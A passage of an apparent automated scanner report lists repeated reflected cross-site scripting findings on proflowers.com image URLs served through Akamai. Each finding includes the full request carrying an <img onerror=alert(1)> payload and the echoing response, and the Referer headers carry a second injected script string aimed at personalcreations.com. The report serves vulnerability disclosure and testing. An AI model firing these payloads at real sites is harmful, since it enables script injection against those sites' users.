HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/P0055092bc4c9f<img src=a onerror=alert(1)>f3daf93728a

4.88. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 80d86<img%20src%3da%20onerror%3dalert(1)>c8d53e072ca was submitted in the REST URL parameter 9. This input was echoed as 80d86<img src=a onerror=alert(1)>c8d53e072ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b80d86<img%20src%3da%20onerror%3dalert(1)>c8d53e072ca?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:23 GMT
Connection: close

Unable to find /ProvideCommerce/P0063828b80d86<img src=a onerror=alert(1)>c8d53e072ca

4.89. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 66f8d<img%20src%3da%20onerror%3dalert(1)>51a292d4f1c was submitted in the REST URL parameter 9. This input was echoed as 66f8d<img src=a onerror=alert(1)>51a292d4f1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b66f8d<img%20src%3da%20onerror%3dalert(1)>51a292d4f1c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:18 GMT
Connection: close

Unable to find /ProvideCommerce/P0065857b66f8d<img src=a onerror=alert(1)>51a292d4f1c

4.90. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 89fba<img%20src%3da%20onerror%3dalert(1)>35e1a132750 was submitted in the REST URL parameter 9. This input was echoed as 89fba<img src=a onerror=alert(1)>35e1a132750 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P007188189fba<img%20src%3da%20onerror%3dalert(1)>35e1a132750?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/P007188189fba<img src=a onerror=alert(1)>35e1a132750

4.91. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 26830<img%20src%3da%20onerror%3dalert(1)>e7f4acdcdc5 was submitted in the REST URL parameter 9. This input was echoed as 26830<img src=a onerror=alert(1)>e7f4acdcdc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b26830<img%20src%3da%20onerror%3dalert(1)>e7f4acdcdc5?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/P0073650b26830<img src=a onerror=alert(1)>e7f4acdcdc5

4.92. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e4e87<img%20src%3da%20onerror%3dalert(1)>4b0efed6b53 was submitted in the REST URL parameter 9. This input was echoed as e4e87<img src=a onerror=alert(1)>4b0efed6b53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988be4e87<img%20src%3da%20onerror%3dalert(1)>4b0efed6b53?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/P0085988be4e87<img src=a onerror=alert(1)>4b0efed6b53

4.93. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2370a<img%20src%3da%20onerror%3dalert(1)>c6102b76f4b was submitted in the REST URL parameter 9. This input was echoed as 2370a<img src=a onerror=alert(1)>c6102b76f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b2370a<img%20src%3da%20onerror%3dalert(1)>c6102b76f4b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:31 GMT
Connection: close

Unable to find /ProvideCommerce/P0087026b2370a<img src=a onerror=alert(1)>c6102b76f4b

4.94. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 952f4<img%20src%3da%20onerror%3dalert(1)>435cb415871 was submitted in the REST URL parameter 9. This input was echoed as 952f4<img src=a onerror=alert(1)>435cb415871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b952f4<img%20src%3da%20onerror%3dalert(1)>435cb415871?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:20 GMT
Connection: close

Unable to find /ProvideCommerce/P0102761b952f4<img src=a onerror=alert(1)>435cb415871

4.95. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 966a9<img%20src%3da%20onerror%3dalert(1)>283e49d607 was submitted in the REST URL parameter 9. This input was echoed as 966a9<img src=a onerror=alert(1)>283e49d607 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ966a9<img%20src%3da%20onerror%3dalert(1)>283e49d607?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007G437_68702_W1_SQ966a9<img src=a onerror=alert(1)>283e49d607

4.96. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9104<img%20src%3da%20onerror%3dalert(1)>f43391f294b was submitted in the REST URL parameter 9. This input was echoed as a9104<img src=a onerror=alert(1)>f43391f294b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQa9104<img%20src%3da%20onerror%3dalert(1)>f43391f294b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:36 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008345X_49771_W1_SQa9104<img src=a onerror=alert(1)>f43391f294b

4.97. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9ac75<img%20src%3da%20onerror%3dalert(1)>86b196c9e7c was submitted in the REST URL parameter 9. This input was echoed as 9ac75<img src=a onerror=alert(1)>86b196c9e7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ9ac75<img%20src%3da%20onerror%3dalert(1)>86b196c9e7c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:21 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000009D282_88198_W1_SQ9ac75<img src=a onerror=alert(1)>86b196c9e7c

4.98. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5af77<img%20src%3da%20onerror%3dalert(1)>4d163bea439 was submitted in the REST URL parameter 9. This input was echoed as 5af77<img src=a onerror=alert(1)>4d163bea439 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ5af77<img%20src%3da%20onerror%3dalert(1)>4d163bea439?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:40 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000009G877_92524_W1_SQ5af77<img src=a onerror=alert(1)>4d163bea439

4.99. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd160<img%20src%3da%20onerror%3dalert(1)>8c6c0a1560c was submitted in the REST URL parameter 9. This input was echoed as dd160<img src=a onerror=alert(1)>8c6c0a1560c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1dd160<img%20src%3da%20onerror%3dalert(1)>8c6c0a1560c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D01X_103184_W1dd160<img src=a onerror=alert(1)>8c6c0a1560c

4.100. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 81f6d<img%20src%3da%20onerror%3dalert(1)>5a8dda194a8 was submitted in the REST URL parameter 9. This input was echoed as 81f6d<img src=a onerror=alert(1)>5a8dda194a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W181f6d<img%20src%3da%20onerror%3dalert(1)>5a8dda194a8?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:20 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D946_103270_W181f6d<img src=a onerror=alert(1)>5a8dda194a8

4.101. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da2a9<img%20src%3da%20onerror%3dalert(1)>f9d94d0215d was submitted in the REST URL parameter 9. This input was echoed as da2a9<img src=a onerror=alert(1)>f9d94d0215d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQda2a9<img%20src%3da%20onerror%3dalert(1)>f9d94d0215d?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:39 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000007G150X_68104_W1_SQda2a9<img src=a onerror=alert(1)>f9d94d0215d

4.102. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fdac5<img%20src%3da%20onerror%3dalert(1)>8cb69ded30 was submitted in the REST URL parameter 9. This input was echoed as fdac5<img src=a onerror=alert(1)>8cb69ded30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQfdac5<img%20src%3da%20onerror%3dalert(1)>8cb69ded30?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:21 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000007H4854_70842_W1_SQfdac5<img src=a onerror=alert(1)>8cb69ded30

4.103. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1cbee<img%20src%3da%20onerror%3dalert(1)>5763a4a3885 was submitted in the REST URL parameter 9. This input was echoed as 1cbee<img src=a onerror=alert(1)>5763a4a3885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ1cbee<img%20src%3da%20onerror%3dalert(1)>5763a4a3885?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
